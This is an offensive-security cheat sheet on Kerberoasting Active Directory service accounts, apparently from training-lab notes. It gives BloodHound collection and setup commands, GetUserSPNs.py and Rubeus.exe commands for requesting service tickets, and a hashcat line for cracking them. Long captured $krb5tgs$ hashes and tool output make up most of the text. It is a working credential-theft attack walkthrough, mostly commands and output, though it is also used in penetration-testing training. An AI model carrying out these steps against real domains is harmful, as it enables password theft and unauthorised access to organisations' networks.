############# Kerberoasting ############# **** INFO **** | https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html | https://luemmelsec.github.io/Kerberoasting-VS-AS-REP-Roasting/?fbclid=IwAR1o_j4polzQUNipGRAdJI0fZueT9uc6V7ZVdrh04JHN2y8VBaS79enXTdI | Other windows related infos https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce | ******************** Kerberoastable users ******************** | Bloodhound can list Kerberoastable users, | Bloodhound need to extract data from ldap and need a valid user of domain. | If you already have a compromised host you can go with SharpHound.exe (https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors) | Otherwise bloodhound-python is a good linux + remote alternative .. code-block:: bash pip3 install --upgrade bloodhound bloodhound-python --dns-tcp -u'user' -p'pass' -ns '10.0.0.1' -d 'domain.local' -c All | | Bloodhound make use of neo4j database, you need to install it (https://neo4j.com/docs/operations-manual/current/installation/linux/debian/#debian-installation) | When facing issues with neo4j database : .. code-block:: bash # Clean sudo apt-get purge neo4j sudo apt-get remove neo4j sudo rm -rf /var/lib/neo4j/ sudo apt autoremove # Install sudo apt-get install neo4j # Specify version if needed JAVA_HOME=/usr/lib/jvm/java-1.17.0-openjdk-amd64 # Run neo4j cd /usr/bin sudo ./neo4j console | | Go to https://localhost:7474/ | creds: neo4j:neo4j | retrieve bloodhound gui here : https://github.com/BloodHoundAD/BloodHound/releases .. code-block:: bash 7z x BloodHound-linux-x64.zip ./BloodHound.bin --no-sandbox | Drag & drop files from bloodhound-python extract | Select "List all kerberoastable accounts" in analysis tab | ********** Kerberoast ********** | .. code-block:: bash GetUserSPNs.py -dc-ip 10.0.0.1 domain.local/user:password -request # ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation # ------------------------------------------- ---------- -------- -------------------------- -------------------------- ---------- # TB-ADMIN-DC/SQLService.THROWBACK.local:6792 SQLService 2020-07-27 17:20:08.552650 2020-07-27 17:26:43.628665 # $krb5tgs$23$*SQLService$THROWBACK.LOCAL$THROWBACK.local/SQLService*$d2e488f1f06ca9b6c7ccd2f7525d20ee$4df9717c382b2a7a464ce68e0e3568863c05d7a75085f269427aeedfa79504cf921040dfc5db8868f7b852e65becdfa4b2c566a141ee52930a7887a01a430a848d928312bbb32635d15209b706fffcf546a234c6bf400999705475a3ac1b12c40ba89dd729c5fcdc25dde8a08f057165de5521633e218668e0f9894961d043685b0b3efe3a5659c9614b1094b6254f29e097887521ddbd49a02cc3af9dbdd5c01711cbdacf571e1becaba28b987670c2df451a8b92edae34d660b30df4d3b1edc54d23c34ca3e580be29db427efcbcaf75f3bdb2adf5142f1ef9348adfc654896897e3c58ad7be9776c4e0c6ee5b274d84ebab5d1e34eb6c2f1fdab26e319e18864bf0253c0f8ca316fde07c1f647b0b09b89434beccb4124d0be4221b3b1cc26dd4a5922199fadc6ad74106c7a24b4a0b16afe92cb5db1a33937f4beebc0bb373aecf687f51c8a346df1229cf90e31be67e6bed204ff8a89d7f2fc19f4863c8e81cba15326fe1f55e951e642e155d9797ec9dec022274c2c9dcfe342baeb062b60a87cfa722085e5a800f5314db3f9248cc000f460e6c61b0ccdfb862b0320169d72532347a30d3bb2c3997f52ed7e42a06511eacff03fd3f4327e46ed14210009a21e64d86c8ee4014a435b496a24f88ab2669a8d1ed6085e709a3f9f5bedf4998e55d94a4c21f55484a5f393b3c313f606ba4f788ed0a3c490f9b3a3a89dde1be15e6847791f4a3626d67f40ff409e7d67ffff3d92a23c74e5f5acd9f93eab0e4207b677441ba9e90a33752aababa837f9d1b356a0191e50ebbdd34e0daa9e316da51c10e0f3b3fa08b37221ebc4e55f6e2b5872a7d6f513d518755f681d75f85355b6d35b993518ba36f3f41b2853f404aa7eb1b6bf6f088e247c725aed17adfd24eefa91562e2235e974845486ae432c8839dcd9455d78d6b046f5cfaf89c9cafa938d9f7a3b618d1837b88518bccf1219a581f536479fcde68667bcac7182e353e9c9d66dff2a83dbd29e0f85ff966e97c2eca23093022511278cc5bf8a52bc771ae0fe18fe222118c9c5a95d957e96ee251b5d998f9a26e3614fc3ba22b040e7e4cd19cff31b9ebdb4872f561ae09ee7f2d7da65b8210bba27a66b0e290a4f897b2fd20269fa4deac316159d89a61c0ebc300d012ca2e0bc3e1ceff7e2a89d1fecf6084d21c60261f7fcd9aee23c177a366389dc2f763dd2902413b9027adcaf01240bf7174417855293a0c1008d63da9c132290411192bc08eb0a479bd998f8cfc9a2c2d6710efe878fa9849f4d458217d42eed1d7ba34a16676f5bc69fb8404a79602d75b43cac0b685a028daa64e02db4fc1491120a0339b731fc81da77c10d1d82920ced02c6b24e5d7 | *********** Crack token *********** | Put the token in hash.txt .. code-block:: bash hashcat -m 13100 -a 0 hash.txt rockyou.txt --potfile-path=HASHCATPOT | ****** Rubeus ****** | Rubeus can perform kerberoast on windows host | Retrieve rubeus.exe here : https://github.com/r3motecontrol/Ghostpack-CompiledBinaries .. code-block:: bash C:\Users\TBSEC_GUEST>C:\Users\TBSEC_GUEST\Desktop\Rubeus.exe kerberoast # ______ _ # (_____ \ | | # _____) )_ _| |__ _____ _ _ ___ # | __ /| | | | _ \| ___ | | | |/___) # | | \ \| |_| | |_) ) ____| |_| |___ | # |_| |_|____/|____/|_____)____/(___/ # # v2.2.0 # # # [*] Action: Kerberoasting # # [*] NOTICE: AES hashes will be returned for AES-enabled accounts. # [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. # # [*] Target Domain : TBSECURITY.local # [*] Searching path 'LDAP://TBSEC-DC01.TBSECURITY.local/DC=TBSECURITY,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' # # [*] Total kerberoastable users : 1 # # # [*] SamAccountName : TBService # [*] DistinguishedName : CN=TBService,OU=Quarantine,DC=TBSECURITY,DC=local # [*] ServicePrincipalName : TBSEC-DC01/TBService.TBSECURITY.local:48064 # [*] PwdLastSet : 7/27/2020 4:29:15 PM # [*] Supported ETypes : RC4_HMAC_DEFAULT # [*] Hash : $krb5tgs$23$*TBService$TBSECURITY.local$TBSEC-DC01/TBService.TBSECURITY.local:48 # 064@TBSECURITY.local*$301DDCA6C7592DC078CF1C4A3439A422$4EF4B3828E0AE7E8E8D9A26C6 # 6954243FA974126BAA3F9416CAAFBEEDCBE5A3499D533DED965239EBE5DC5B43DA6CDC8F50C4DF5E # F0A2FDE58B506C6D85319CBD071509B99D8707903DEED23948EEC03C6AD67AD5C506796FF26CC770 # A8FF5C8F85964DD2442673267796FACE7AB69928426763D28E80317530182D306A656CF6DEBFEB85 # 9F72B62872723A7ADDF6AD4F8AC9CB1BC57C2861AFB2ED3F1B5C02C2A491B34E9FFD94D538044752 # BBD64F3E4A67A0DB99F0F81D26737EF374B4E91978340FB068360DF35DF64E6FE85B2EAD432F245C # 858D02AC0990230327FDAC5A51ABF66A39031692BBF7F750518F00A4FE95935F6C2A28DA06E9BC0D # 56ABC67E04E8DA59BB99B6B59DD865BA84CB026752BECAB02B76576D8999B60FCE2E509B881CE1FD # 29CB2EF2198E167273793E377736E9167F25B24B8B9EBAE37D8B6EBE948EC60A1616A0A6C07CF866 # AF282138616AF4FF10226D8768A36C9FE1BC2540619646BF43FD51DC26D594938BFC2039912B5DE8 # CFF4510A3465C2F38127FB579157EB3D200C0CE8D519361A05889C2DD9647CC3B8FFEE1EBF01BD7D # E01F3CC1809FD46598E82957E493B9C941F52D4EB0EB7A3AB74560FEEA5B2873AA4E5AEC465B3F4F # AA21C753AE87FAA565DD50CF34A3AA1625A768E10B09C6FAB089694669692F7089B2DF93808742D8 # 33C2A0F2BB8AA3E4A1185748FD303E61E3CDB507E25C65055D858325AB3D9FD210510F4D158F4448 # 639F2E75C8AAC086CF23EE20F3552B94B93022D1C6BBE519F67430977256B7834DC9B6E2EF904167 # 9C0AF0B65C8E4AB7AAA3836074D70F8E4A95C221F95574CC7091DC40EE670A0D28DABBC811FA4C7D # C555A89882C4DCD9AB89CD151AC9FF80CB9EA8DA0ABD98EB6068C2FC8087EF1DD8B2F1C2A9402111 # 5946C94948F00B0154DB7823D0F9862B6AF2391C49F8667F6BFEB6EF08189817D4FF67614BDA9358 # 4ABF4641DF125B548C8103B1120E2E839BA98F25A5F6AADFE9C63A6279D1375AB99FBFC6CCC87CD4 # 1B7D1650B2A48747E07B96AA44E586526E93D11422C491AD290DEC841D299D88CC33F9039181B380 # B69B167C987671D74BFB0E056E8703F26CF509C7932EF21E65A794F744C1422CF20ADA3C6E011DB9 # 0D40FD342CBA634BF573B0DFFD8C7788992ABF8BD6D3031BB8470CF30F48B14AC36FD7115F764382 # 1C72CCEAC04A87106C8F9B970E4EAEDCECC66FE31E3019604D817E52D16B3578E13CD36D558156C3 # 46F6DE486F34A45268527D37D19E474CA500738174FD94316604E43BB60BE6986284D87D52FF383B # CA9FDD7ABB7830CC65FC625B676C01F14A6B5CD454CC645384E88031F67EB204A7906C3E58237530 # E0017BA084CBE5C23CDC1C37985CF86BCF03C8AE4C5AB11D4D8C6AC3FD95B63C1898EF4AD729D87B # 021034E6FF6C8AA8A7D50DED71415268B4064830CBD1D6B4A5B8C0A532CD67B8F8354AEEC41807F4 # E30A6114D033D3DB5065C60675D5D3F3818B8C8B4A0EB02A6599BAB27B3CF0694DEF771B20F0D6FF # 289 # # $krb5tgs$23$*TBService$TBSECURITY.local$TBSEC-DC01/TBService.TBSECURITY.local:48064@TBSECURITY.local*$301DDCA6C7592DC078CF1C4A3439A422$4EF4B3828E0AE7E8E8D9A26C66954243FA974126BAA3F9416CAAFBEEDCBE5A3499D533DED965239EBE5DC5B43DA6CDC8F50C4DF5EF0A2FDE58B506C6D85319CBD071509B99D8707903DEED23948EEC03C6AD67AD5C506796FF26CC770A8FF5C8F85964DD2442673267796FACE7AB69928426763D28E80317530182D306A656CF6DEBFEB859F72B62872723A7ADDF6AD4F8AC9CB1BC57C2861AFB2ED3F1B5C02C2A491B34E9FFD94D538044752BBD64F3E4A67A0DB99F0F81D26737EF374B4E91978340FB068360DF35DF64E6FE85B2EAD432F245C858D02AC0990230327FDAC5A51ABF66A39031692BBF7F750518F00A4FE95935F6C2A28DA06E9BC0D56ABC67E04E8DA59BB99B6B59DD865BA84CB026752BECAB02B76576D8999B60FCE2E509B881CE1FD29CB2EF2198E167273793E377736E9167F25B24B8B9EBAE37D8B6EBE948EC60A1616A0A6C07CF866AF282138616AF4FF10226D8768A36C9FE1BC2540619646BF43FD51DC26D594938BFC2039912B5DE8CFF4510A3465C2F38127FB579157EB3D200C0CE8D519361A05889C2DD9647CC3B8FFEE1EBF01BD7DE01F3CC1809FD46598E82957E493B9C941F52D4EB0EB7A3AB74560FEEA5B2873AA4E5AEC465B3F4FAA21C753AE87FAA565DD50CF34A3AA1625A768E10B09C6FAB089694669692F7089B2DF93808742D833C2A0F2BB8AA3E4A1185748FD303E61E3CDB507E25C65055D858325AB3D9FD210510F4D158F4448639F2E75C8AAC086CF23EE20F3552B94B93022D1C6BBE519F67430977256B7834DC9B6E2EF9041679C0AF0B65C8E4AB7AAA3836074D70F8E4A95C221F95574CC7091DC40EE670A0D28DABBC811FA4C7DC555A89882C4DCD9AB89CD151AC9FF80CB9EA8DA0ABD98EB6068C2FC8087EF1DD8B2F1C2A94021115946C94948F00B0154DB7823D0F9862B6AF2391C49F8667F6BFEB6EF08189817D4FF67614BDA93584ABF4641DF125B548C8103B1120E2E839BA98F25A5F6AADFE9C63A6279D1375AB99FBFC6CCC87CD41B7D1650B2A48747E07B96AA44E586526E93D11422C491AD290DEC841D299D88CC33F9039181B380B69B167C987671D74BFB0E056E8703F26CF509C7932EF21E65A794F744C1422CF20ADA3C6E011DB90D40FD342CBA634BF573B0DFFD8C7788992ABF8BD6D3031BB8470CF30F48B14AC36FD7115F7643821C72CCEAC04A87106C8F9B970E4EAEDCECC66FE31E3019604D817E52D16B3578E13CD36D558156C346F6DE486F34A45268527D37D19E474CA500738174FD94316604E43BB60BE6986284D87D52FF383BCA9FDD7ABB7830CC65FC625B676C01F14A6B5CD454CC645384E88031F67EB204A7906C3E58237530E0017BA084CBE5C23CDC1C37985CF86BCF03C8AE4C5AB11D4D8C6AC3FD95B63C1898EF4AD729D87B021034E6FF6C8AA8A7D50DED71415268B4064830CBD1D6B4A5B8C0A532CD67B8F8354AEEC41807F4E30A6114D033D3DB5065C60675D5D3F3818B8C8B4A0EB02A6599BAB27B3CF0694DEF771B20F0D6FF289